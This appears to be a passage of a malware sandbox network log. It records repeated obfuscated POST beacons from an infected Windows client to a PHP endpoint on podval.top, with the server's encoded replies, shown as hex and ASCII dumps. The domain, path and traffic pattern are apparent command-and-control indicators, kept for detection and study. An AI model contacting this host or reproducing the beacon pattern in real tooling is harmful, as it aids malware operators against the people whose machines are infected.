                                                    Data Ascii: _TZX^[WZXVUQP\YVU[^[Q\SXSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!18&:<%0(-%#[69-5')'##8.<#T(,<"['$Y 1
                                                    Jul 3, 2024 16:43:03.985858917 CEST1236INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:03 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lkBKlf%2BrOaylPrznX22P70J5fyUCpgcykk0h%2BWM7JqRgSePvx6GzfOPzHcujYeven9MSJK77E7gmE9LxXPSRulWPYkUrvGd2Io7Zezvldm36rSzQ1D9RogfM15kn"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a54bcf6e7cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 31 38 0d 0a 09 1a 25 1a 27 29 36 00 25 0c 3f 50 2e 13 2f 56 2b 3d 2f 05 2f 29 0c 06 28 1a 0b 58 2d 2e 26 16 20 2a 26 5e 3f 02 0a 5d 26 1e 20 56 23 21 20 5b 04 1c 20 02 3e 3a 3d 5e 29 2b 38 0b 31 05 36 1a 24 37 13 1e 27 3b 0c 55 33 01 34 03 3f 2b 36 0e 27 1c 2f 58 3d 06 07 00 3f 09 00 58 35 0e 21 54 02 13 21 0e 33 3d 17 55 34 0e 38 0c 26 20 35 1b 30 1d 2f 1b 27 33 2e 54 3d 20 26 52 26 31 15 00 36 01 37 10 30 01 3a 15 24 3e 32 01 22 38 23 5f 2b 00 00 15 04 59 05 3d 38 5e 28 5a 3b 3a 34 19 0c 2b 20 16 39 04 10 09 04 3e 31 1c 31 57 5f 24 35 5c 12 2d 38 35 02 25 38 2c 5a 1e 3b 3a 19 06 08 3b 3c 1c 39 3c 3c 25 06 58 08 08 37 5a 1c 2a 30 2c 00 30 24 26 14 23 38 32 53 1c 3b 3c 0a 3d 09 31 23 23 36 38 0f 21 31 2a 38 58 39 00 3f 20 0a 2e 08 1d 01 5e 09 24 0b 3d 1d 10 32 3e 16 1e 0d 24 22 58 39 05 51 08 3d 57 2c 16 34 3f 24 20 34 2e 27 24 00 2a 18 07 07 1c 26 5f 30 3f 29 0f 08 2b 56 3a 33 30 11 20 3e 54 02 56 3f 35 1a 5d 00 30 12 2c 22 05 08 30 31 29 53 08 3e 05 1c 21 3f 36 1c 2f 3d 01 25 0e 3c 5d 34 59 28 [TRUNCATED]
                                                    Data Ascii: 418%')6%?P./V+=//)(X-.& *&^?]& V#! [ >:=^)+816$7';U34?+6'/X=?X5!T!3=U48& 50/'3.T= &R&1670:$>2"8#_+Y=8^(Z;:4+ 9>11W_$5\-85%8,Z;:;<9<<%X7Z*0,0$&#82S;<=1##68!1*8X9? .^$=2>$"X9Q=W,4?$ 4.'$*&_0?)+V:30 >TV?5]0,"01)S>!?6/=%<]4Y()*3V,64$3&R<0<991>,T[T1:\68>05*0D;6[";8! >?<9R43'#+81/.#^$><)*1$=;4,;:S$8/<;'8W9<%2;@\=&1=&;';[87V/0;!"8>;>U(04+;XD/2<4>>5&:&#:TU7,819:$*7/)*>9!61#&TU?7?"80?:& 7^R?&=:;1,(>W3_=*$&5;":4ZZ1[,<?3E'$T9?)-9R=U#!>[R:4%%.:5[:23<'<+4
                                                    Jul 3, 2024 16:43:03.985881090 CEST388INData Raw: 02 3d 03 02 50 23 2a 1d 35 3e 07 0c 0a 04 3e 1b 59 3f 09 24 28 22 07 53 2c 3b 06 24 02 39 2f 2d 19 3c 28 27 3b 3e 06 02 1c 0e 56 1e 37 32 5a 0c 1d 3d 3e 03 59 02 3f 14 2c 3a 1a 3e 39 08 2f 0e 0c 34 3f 06 21 09 0a 1e 10 31 02 03 04 36 5f 24 24 34
                                                    Data Ascii: =P#*5>>Y?$("S,;$9/-<(';>V72Z=>Y?,:>9/4?!16_$$4:Z,*Y2;\8/2X8E5Q*:.3=:>_(,9056>4@0=69"+0;&;?R3:2/?6>+08?A5*1'7!8+&W01*4!76?!9601VA+5''025>#>#:89"-8,
                                                    Jul 3, 2024 16:43:04.030235052 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:04.125884056 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:04.128640890 CEST1772OUTData Raw: 5f 50 5f 59 5e 5a 57 59 58 56 55 51 50 51 59 56 55 51 5e 58 51 5f 53 57 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _P_Y^ZWYXVUQPQYVUQ^XQ_SWSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!'*/' 0;>=)W4)Y.]0&9'3 /41#,"['$Y
                                                    Jul 3, 2024 16:43:04.427103996 CEST725INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:04 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rptVC7n00K9di7PHEr08XON0eOFPFt7OYjMHFOgWNL04Ln7H8Xytho30hNldUiWr9RWFe7oCwAUchhtDnzKHtFGXShmIOOVMDwJgCjagOR4sZZbOCEqF68x%2FErgA"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a54e8a337cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 14 31 04 07 11 32 0c 20 0c 3a 13 23 19 2b 3d 38 5d 3b 07 2d 5f 2a 27 21 13 2c 2d 3d 09 22 3a 0c 5a 2a 2f 2f 00 25 1e 20 57 23 31 20 5b 04 1c 23 5d 3c 14 25 5f 2b 2b 27 11 26 3c 26 18 30 0e 35 5c 24 28 31 0c 30 28 37 1f 3d 28 2a 0f 24 22 23 10 29 06 32 1c 2a 27 21 01 36 34 21 54 02 13 22 1f 33 13 31 55 20 30 2c 0d 27 23 3a 04 30 0a 3b 52 25 33 26 1e 2a 0a 39 0a 30 31 38 59 36 3f 0d 1f 27 06 3e 5a 27 03 39 5b 36 38 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98%12 :#+=8];-_*'!,-=":Z*//% W#1 [#]<%_++'&<&05\$(10(7=(*$"#)2*'!64!T"31U 0,'#:0;R%3&*9018Y6?'>Z'9[68#_+)V3YT0
                                                    Jul 3, 2024 16:43:05.433264017 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:05.527570009 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:05.531584024 CEST1792OUTData Raw: 5f 51 5f 54 5b 5f 52 5c 58 56 55 51 50 5c 59 53 55 5c 5e 5a 51 5d 53 5f 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _Q_T[_R\XVUQP\YSU\^ZQ]S_SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"Y':3')/^'V$>X)S#-=]:X)'=[33V8,4#/<"['$Y 1
                                                    Jul 3, 2024 16:43:05.870942116 CEST735INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:05 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6Yptna9PmFDbDoxjF4CNnaBLLfaIA5abdsQNPlOaThBLCbOcrxf3%2B%2BZ4Cj7ZzdIZVlLJ1PI%2BjdPe6PAWQsxcLfR6gTiERn%2F9JSYno%2BQygISjEYFvRtobnhALT%2FOT"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5574b7a7cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 5c 25 29 2d 5a 26 31 2b 53 3a 03 27 51 28 3d 34 1b 2d 29 39 5d 28 24 00 04 2c 2d 29 0b 34 5c 2a 18 28 2c 33 07 32 09 24 1d 36 31 20 5b 04 1c 20 00 3f 3a 03 5f 2b 38 2f 57 26 2f 2e 1b 24 19 21 11 27 15 2e 11 33 3b 34 02 28 06 2a 0c 27 21 33 5c 29 28 00 11 2a 37 36 59 36 1e 21 54 02 13 21 0d 24 13 3e 0b 34 30 2c 0b 25 30 36 07 24 42 33 1b 33 55 2d 0f 28 33 0b 0f 26 22 3b 03 23 2f 2f 54 24 16 2d 04 27 3d 2d 5c 35 38 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98%\%)-Z&1+S:'Q(=4-)9]($,-)4\*(,32$61 [ ?:_+8/W&/.$!'.3;4(*'!3\)(*76Y6!T!$>40,%06$B33U-(3&";#//T$-'=-\58#_+)V3YT0
                                                    Jul 3, 2024 16:43:06.886022091 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:06.980633974 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:06.980860949 CEST1792OUTData Raw: 5f 5a 5a 5b 5e 58 57 5a 58 56 55 51 50 5c 59 57 55 5b 5e 5f 51 55 53 56 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _ZZ[^XWZXVUQP\YWU[^_QUSVSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"\&_0B$#\'V7)>V -9&'&%Z'+T;X#T(-,"['$Y 1
                                                    Jul 3, 2024 16:43:07.326455116 CEST729INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:07 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1oXnMaQMVdZa7%2B3A7Usqe%2Be1AKh%2BYWJ5LSTiOtt2ORyi1a4C8ub6MeU1oXz5EpQ205ZelvTgZrycY3GXPsTftgkvPyJZAoYUdmqLiKMeLf5bRFx9aif8lwgGHtTC"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5605da27cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 1a 25 14 26 03 26 0c 2f 51 2c 3d 2b 1a 3c 3d 2c 14 3b 39 03 14 2a 24 0f 59 2c 3d 31 0b 23 3a 3d 02 2b 5a 37 04 26 30 33 09 36 21 20 5b 04 1c 23 5b 3e 39 29 5e 3c 01 24 0a 32 3f 21 41 30 24 25 5c 24 2b 31 0b 24 38 2b 11 3c 28 35 57 30 0c 23 13 29 01 39 00 3c 09 31 02 22 1e 21 54 02 13 21 0f 27 2d 1c 0d 23 30 0d 1e 26 33 29 5c 30 24 20 08 25 23 36 55 3e 30 36 52 26 31 1a 11 35 3f 0a 0c 24 5e 31 05 27 5b 3a 01 21 12 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98%%&&/Q,=+<=,;9*$Y,=1#:=+Z7&036! [#[>9)^<$2?!A0$%\$+1$8+<(5W0#)9<1"!T!'-#0&3)\0$ %#6U>06R&15?$^1'[:!#_+)V3YT0
                                                    Jul 3, 2024 16:43:08.345185995 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:08.440224886 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:08.440429926 CEST1792OUTData Raw: 5f 53 5f 5d 5b 5b 52 5b 58 56 55 51 50 5c 59 55 55 51 5e 55 51 5a 53 5f 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _S_][[R[XVUQP\YUUQ^UQZS_SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!%9 $9$33?^(.: >![-*3%00,-;^#2/"['$Y 1
                                                    Jul 3, 2024 16:43:08.778057098 CEST725INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:08 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VTnQnMMkKKzxlm23wj4tue%2FiKJGf5c1agtXa0bD8op2ee4lPTsIXmN5xERc4FmVb7BcoXtQYOVmMqtyGnbY0otVMekKSu9pUuB7VXiA6uKqG87w4dm7KUx4e7nag"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5697f727cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 1a 26 2a 0f 11 31 21 34 08 2e 03 27 57 3c 04 2b 01 2d 3a 26 07 2b 37 26 00 2c 3e 2e 53 20 04 0c 5e 2b 12 0d 01 31 23 3c 55 23 21 20 5b 04 1c 23 59 2b 03 2e 02 28 3b 33 55 31 2f 22 1f 24 27 14 00 24 38 3e 11 24 38 23 59 28 2b 22 08 30 1c 01 1e 3d 5e 26 5f 28 27 21 07 22 24 21 54 02 13 21 09 33 03 22 0c 20 0e 2f 1e 26 23 22 04 30 0a 0e 0c 27 0a 35 0b 29 20 3e 56 30 1f 38 13 21 3f 05 53 24 01 32 5c 24 3d 21 5a 22 28 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98%&*1!4.'W<+-:&+7&,>.S ^+1#<U#! [#Y+.(;3U1/"$'$8>$8#Y(+"0=^&_('!"$!T!3" /&#"0'5) >V08!?S$2\$=!Z"(#_+)V3YT0
                                                    Jul 3, 2024 16:43:09.792803049 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:09.887660027 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:09.887831926 CEST1772OUTData Raw: 5f 5b 5f 5c 5e 5b 57 5e 58 56 55 51 50 5f 59 50 55 5c 5e 5a 51 54 53 56 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _[_\^[W^XVUQP_YPU\^ZQTSVSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"X'*<C$^' ?\*.4-=9:0%% 4;>^#!$[/,"['$Y =
                                                    Jul 3, 2024 16:43:10.223191977 CEST729INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:10 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=67WZ7Hwez4blkMXHTe6fIiR%2FHzCYwJf0c0CZWvLZ5SnliWpbajmjMuKCpV2b8oGic7fTyc52jq9p%2F%2FVdSHzXpOTXlwP8u1FoPdZifVKrDmrxoTAuOSdSog90pWUZ"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a57289c77cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 26 01 31 3a 0c 01 32 31 34 0a 2d 3d 38 0b 3f 3d 09 06 2f 07 0b 14 28 24 3d 10 3a 58 36 18 34 39 29 03 28 02 2f 01 26 09 24 50 36 21 20 5b 04 1c 23 58 3c 5c 3e 07 28 06 33 1c 24 2c 08 19 24 09 26 00 33 02 3a 1e 30 2b 28 05 2b 3b 21 13 24 31 2c 03 3d 16 3e 5f 28 27 04 59 36 0e 21 54 02 13 21 0f 25 2d 17 57 20 33 3f 55 25 1e 31 5c 30 1d 30 0d 27 23 3e 1f 2a 30 25 0f 24 32 24 5a 22 59 2b 1f 33 28 07 07 27 13 32 05 36 38 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98&1:214-=8?=/($=:X649)(/&$P6! [#X<\>(3$,$&3:0+(+;!$1,=>_('Y6!T!%-W 3?U%1\00'#>*0%$2$Z"Y+3('268#_+)V3YT0
                                                    Jul 3, 2024 16:43:11.229513884 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1744
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:11.327704906 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:11.328689098 CEST1744OUTData Raw: 5f 51 5a 5b 5b 57 57 59 58 56 55 51 50 59 59 53 55 5e 5e 55 51 59 53 59 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _QZ[[WWYXVUQPYYSU^^UQYSYSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!&$?X$Z*>.#=::-\0&&% +;=;[4<_-<"['$Y
                                                    Jul 3, 2024 16:43:11.621368885 CEST737INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:11 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BV%2B46%2FCP4STaVsmQF0hwVYq%2BexqPim1v3FK4TchDZMI%2FESP8XZBw3YjS9w66SyWhG6Pgz3o1vhHQKVqQuwPArc%2Fuxzs0DW6X%2FWDuG3CVa42S9rDztbOZhpRPRU0k"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a57b7ca47cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 26 00 26 03 21 58 26 31 37 50 2e 03 3f 53 3f 03 24 15 2f 39 26 06 2b 1a 3e 00 2e 58 2a 55 20 29 35 07 3f 02 37 06 25 56 2c 55 35 0b 20 5b 04 1c 20 05 2b 03 36 07 28 06 2f 1c 26 05 29 08 27 37 25 13 27 02 26 1c 24 38 27 59 3d 3b 3d 51 33 0c 09 5c 3d 38 2a 1c 2a 27 35 00 21 0e 21 54 02 13 21 09 24 3d 22 0c 20 56 3b 1c 25 20 32 05 33 27 34 0c 30 20 36 1f 29 23 22 56 26 31 19 01 21 11 20 0b 27 3b 26 5e 27 13 39 1f 36 28 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98&&!X&17P.?S?$/9&+>.X*U )5?7%V,U5 [ +6(/&)'7%'&$8'Y=;=Q3\=8**'5!!T!$=" V;% 23'40 6)#"V&1! ';&^'96(#_+)V3YT0
                                                    Jul 3, 2024 16:43:12.636010885 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:12.731632948 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:13.067936897 CEST729INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:13 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5pFQcBkMTFZPO8Ow0C81dfm9wnQAVMDBUnZWneMq0YCa4hNsifw1u3zYKVR%2BXiTrOTsnQqZX%2FWodZu6jMBdol2X6G6SssPWY0miDKvc3qdXCgET6%2BnM8gjAxEWB9"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5844df87cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 1a 32 29 29 1e 26 54 2c 09 2e 3d 2f 1b 29 3e 24 5e 2f 29 32 05 2a 24 3d 1e 2e 58 35 0c 23 5c 22 5b 2a 2c 02 1b 25 30 0e 51 35 1b 20 5b 04 1c 20 01 3c 04 2a 02 28 01 38 0f 26 12 08 1b 27 37 13 1e 26 3b 26 1e 27 38 05 1f 3c 01 3e 0c 33 31 33 13 29 2b 26 1c 28 37 07 06 35 34 21 54 02 13 22 1f 33 04 26 0c 21 23 23 1e 27 20 1c 05 33 1a 01 54 33 0d 29 0f 29 55 39 0e 24 31 12 59 22 11 3f 1e 26 38 21 05 30 3d 0b 10 35 02 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98%2))&T,.=/)>$^/)2*$=.X5#\"[*,%0Q5 [ <*(8&'7&;&'8<>313)+&(754!T"3&!##' 3T3))U9$1Y"?&8!0=5#_+)V3YT0
                                                    Jul 3, 2024 16:43:14.073318005 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:14.168092966 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:14.501064062 CEST733INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:14 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KLJsmCU9iDMvHGDi%2FO5jRbHHKgRUCpRi86U%2FrnwC6mWTsW3qyqiyUvaix%2B7VOZh9505qDDCCJeaaA66%2Fq46yrxuYw54QYesuZxjRjjY6cLFr%2BqmNxF0JBVJcVTYG"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a58d4fba7cb2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 1a 25 2a 03 5c 25 32 01 55 2c 3e 3f 52 28 3d 34 58 3b 00 31 14 2a 24 29 10 2e 58 29 08 20 14 25 06 2b 3c 20 59 26 09 3c 13 21 1b 20 5b 04 1c 23 12 3e 39 21 5f 2b 38 24 0e 26 05 35 41 25 27 18 02 30 02 3e 11 24 28 37 5b 28 28 18 0e 24 31 24 03 2a 28 0c 13 28 0e 29 07 21 34 21 54 02 13 21 0c 24 13 21 52 21 30 27 52 26 20 17 5c 27 24 20 09 24 30 22 54 29 23 29 0e 27 22 28 13 22 11 2f 1d 30 5e 22 5d 27 3d 3d 59 21 12 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98%%*\%2U,>?R(=4X;1*$).X) %+< Y&<! [#>9!_+8$&5A%'0>$(7[(($1$*(()!4!T!$!R!0'R& \'$ $0"T)#)'"("/0^"]'==Y!#_+)V3YT0
                                                    Jul 3, 2024 16:43:15.512069941 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
